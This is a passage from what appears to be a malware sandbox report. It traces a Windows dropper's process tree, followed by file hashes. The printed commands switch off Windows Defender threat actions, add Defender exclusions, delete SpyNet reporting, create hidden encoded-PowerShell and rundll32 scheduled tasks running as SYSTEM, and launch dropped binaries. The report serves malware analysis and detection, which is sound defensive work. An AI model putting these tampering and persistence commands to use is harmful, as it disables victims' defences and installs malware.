Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1800
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:3588
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2412
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4328
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:2312
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:904
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:4256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:4708
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:4420
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:4088
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:3644
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:2368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:5080
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:1540
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:1480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:3816
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PTcVEVWfzVfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PTcVEVWfzVfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SnQMkCffU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SnQMkCffU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XracVvRTBJUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XracVvRTBJUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nNoOyOjreWgVC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nNoOyOjreWgVC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\DIqJuicHJdmqOkVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\DIqJuicHJdmqOkVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dEvNveGTTlDzBjVk\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\dEvNveGTTlDzBjVk\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4512 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR" /t REG_DWORD /d 0 /reg:323⤵PID:2516
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR" /t REG_DWORD /d 0 /reg:324⤵PID:2824
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR" /t REG_DWORD /d 0 /reg:643⤵PID:4792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PTcVEVWfzVfU2" /t REG_DWORD /d 0 /reg:323⤵PID:428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PTcVEVWfzVfU2" /t REG_DWORD /d 0 /reg:643⤵PID:4324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SnQMkCffU" /t REG_DWORD /d 0 /reg:323⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SnQMkCffU" /t REG_DWORD /d 0 /reg:643⤵PID:4340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XracVvRTBJUn" /t REG_DWORD /d 0 /reg:323⤵PID:4532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XracVvRTBJUn" /t REG_DWORD /d 0 /reg:643⤵PID:3108
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNoOyOjreWgVC" /t REG_DWORD /d 0 /reg:323⤵PID:3472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nNoOyOjreWgVC" /t REG_DWORD /d 0 /reg:643⤵PID:2344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\DIqJuicHJdmqOkVB /t REG_DWORD /d 0 /reg:323⤵PID:3028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\DIqJuicHJdmqOkVB /t REG_DWORD /d 0 /reg:643⤵PID:3744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG /t REG_DWORD /d 0 /reg:323⤵PID:4940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\lVNrrOatpBrXIgYLG /t REG_DWORD /d 0 /reg:643⤵PID:4232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dEvNveGTTlDzBjVk /t REG_DWORD /d 0 /reg:323⤵PID:4348
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\dEvNveGTTlDzBjVk /t REG_DWORD /d 0 /reg:643⤵PID:5056
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnfhMqZJv" /SC once /ST 03:02:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:4968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnfhMqZJv"2⤵PID:3416
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnfhMqZJv"2⤵PID:660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VxfUuShlQNbdQSXLl" /SC once /ST 02:37:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\dEvNveGTTlDzBjVk\NdOgoxRMZzqSCrz\hyRojpn.exe\" Xe /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2512
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "VxfUuShlQNbdQSXLl"2⤵PID:1808
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3736
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:1848
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:800
-
C:\Windows\Temp\dEvNveGTTlDzBjVk\NdOgoxRMZzqSCrz\hyRojpn.exeC:\Windows\Temp\dEvNveGTTlDzBjVk\NdOgoxRMZzqSCrz\hyRojpn.exe Xe /site_id 525403 /S1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4692 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bmPPeHndeZJiZewMwY"2⤵PID:4364
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4192
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:4068
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:3644
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SnQMkCffU\pmMXXd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "OwLyLJfWgdznQZv" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2552
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OwLyLJfWgdznQZv2" /F /xml "C:\Program Files (x86)\SnQMkCffU\myBRlhk.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "OwLyLJfWgdznQZv"2⤵PID:1804
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OwLyLJfWgdznQZv"2⤵PID:2012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYfjkBJVkoGZVb" /F /xml "C:\Program Files (x86)\PTcVEVWfzVfU2\mvuHQDC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3360
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MGVYQKklyNzJH2" /F /xml "C:\ProgramData\DIqJuicHJdmqOkVB\pafYuuP.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1588
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "JqXblPsAvkoafrXLx2" /F /xml "C:\Program Files (x86)\PLSiPWpMcbIKVQxaRhR\wEdWBaT.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3572
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "odNIlJBFKFxjoOxUYma2" /F /xml "C:\Program Files (x86)\nNoOyOjreWgVC\jWVtOmO.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3884
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UjaziEjLbJEPTlLHt" /SC once /ST 04:48:38 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\dEvNveGTTlDzBjVk\tfQTemSz\qWCodBZ.dll\",#1 /site_id 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3632
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "UjaziEjLbJEPTlLHt"2⤵PID:4164
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:1712
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:3824
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:4588
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:3040
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "VxfUuShlQNbdQSXLl"2⤵PID:2376
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dEvNveGTTlDzBjVk\tfQTemSz\qWCodBZ.dll",#1 /site_id 5254031⤵PID:4948
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\dEvNveGTTlDzBjVk\tfQTemSz\qWCodBZ.dll",#1 /site_id 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:5044 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "UjaziEjLbJEPTlLHt"3⤵PID:4644
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5cd9d5445408ce3ec64c5fbc2f099e0f6
SHA19c3a0c486d2269a05f205f2326206f7e5315b0bc
SHA25628d70d456b479376a972de2e3f5277b169d8b1b7911eac36c4a86ac913ba6856
SHA512827b9a258211a6a66b1da2e3e6e1d029ef4de0aaec3a33b204a04158058153782f43dfad3fab2845bd22dd5323e7bd5f82c87a4fad8f9fa9928cc47a0889756d
-
Filesize
2KB
MD5edd2e8e943d24849ad14122b13716066
SHA11f661a391353a14066d952fb63fef22aa99f81f8
SHA2564a9ef0ac9c556e1302ad1f43fa564176fd5d388210fb3dc2cd59d13aba3125af
SHA512078f44c8195b04f6ec0a09e0ca9c124d5bc6385ef4aaebbbb68957fecd936d81106f48d2b6368ecd14d4828e6d5af88622ceb5313d797a35774dc6403b4fbbb7
-
Filesize
2KB
MD5a1a0de300790b4202734a06d254715d5
SHA1de992b60b9a9f3a3eacc85e7a847ded9a8304388
SHA256a292708c2cf038cd418e1a2f511df9f4f31513a3979b99b39feef7d44f58088c
SHA512f33d1a6fb8a8f4251b10aef3014ed798299e89b87a29f7150dc8eaea8b8c677a3ad644f6dffa8d1ce3191cbc49c17a6fb3af630747f817420f1a4360d60cc302
-
Filesize
2KB
MD5a48bdd91f8b6ed371e6cecc0ba71771f
SHA149f79e845f9790588f3abdec364da2de176c269d
SHA256203aa02c3ac36470dae662845f30d525547c6c62dfe6ee794d44c7cdb0283ce8
SHA51256109b12fd6abe7afc21ff1cc3b01ccb62256625f3bd2123ec12a906514ff8c76ee856ba12a430bcd6bc5b222de79c94dbe3b34b8d1cd514491848b8200a4b9b
-
Filesize
2KB
MD515421e9dccddc54ab8878e4855dedffa
SHA1adafb4f043ab36418c3e7891b469ec4c918ce512
SHA256f695c162a501133860ef7108860926ab57129bab808d2910a21b9c47ef68ac25
SHA512d5522d8abe57957a334f10dd2d0617050ba7119c13bb1b17855f981a873f28e153b099d356cb5f44ab906d8bf377823072b698607ba2ed345c5fd62bb7bc08fe
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
64B
MD5a6c9d692ed2826ecb12c09356e69cc09
SHA1def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA5122f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3
-
Filesize
6.3MB
MD5350fe7d476852e9deef5e0110d54acaf
SHA14294e22a0d25cd88e7f9b7fdcaffa4efbc119b7e
SHA256e20b8ed1fd2eb846760857847ad28fe23e8be9303051d50ed2f106e952006c9d
SHA51267f60d672d06d173d0f19c5c6448e7e23ac906432a8adb045d7ebff070b78988eef7da722fbfc1dd471537310d5fdd6bfcd07b7b7d4d3c917b22204c27fd5902
-
Filesize
6.3MB
MD5350fe7d476852e9deef5e0110d54acaf
SHA14294e22a0d25cd88e7f9b7fdcaffa4efbc119b7e
SHA256e20b8ed1fd2eb846760857847ad28fe23e8be9303051d50ed2f106e952006c9d
SHA51267f60d672d06d173d0f19c5c6448e7e23ac906432a8adb045d7ebff070b78988eef7da722fbfc1dd471537310d5fdd6bfcd07b7b7d4d3c917b22204c27fd5902
-
Filesize
6.8MB
MD50f71aeb8223298ae92b7f724f95c34ed
SHA1fa1a037194c2bbdac15b8d2677ee24e91f458dd4
SHA2561073ec0e3decc4225f027be1a982262d4a7787958db88bd3bfb1cfc2d0870f7d
SHA5124b6dd6f11be2a9ed6cbc1aad7ab267fe309b522930ddb4ea228d1ac3b91cd2aa1d28e72427e3565814f2d6ec7607b0ff8d534c99f8871928bc6618f29bbe0a01
-
Filesize
6.8MB
MD50f71aeb8223298ae92b7f724f95c34ed
SHA1fa1a037194c2bbdac15b8d2677ee24e91f458dd4
SHA2561073ec0e3decc4225f027be1a982262d4a7787958db88bd3bfb1cfc2d0870f7d
